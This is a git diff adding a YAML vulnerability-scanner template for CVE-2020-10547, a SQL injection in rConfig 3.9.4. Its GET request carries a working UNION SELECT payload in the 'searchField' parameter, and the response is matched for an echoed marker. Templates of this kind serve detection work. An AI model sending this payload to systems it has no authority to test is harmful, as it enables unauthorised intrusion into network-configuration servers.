diff --git a/cves/2020/CVE-2020-10547.yaml b/cves/2020/CVE-2020-10547.yaml new file mode 100644 index 0000000000..b5ef60e413 --- /dev/null +++ b/cves/2020/CVE-2020-10547.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-10547 +info: + name: rConfig 3.9.4 SQLi + author: madrobot + severity: high + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547 + tags: SQLI + +requests: + - method: GET + path: + - "{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "[project-discovery]" + part: body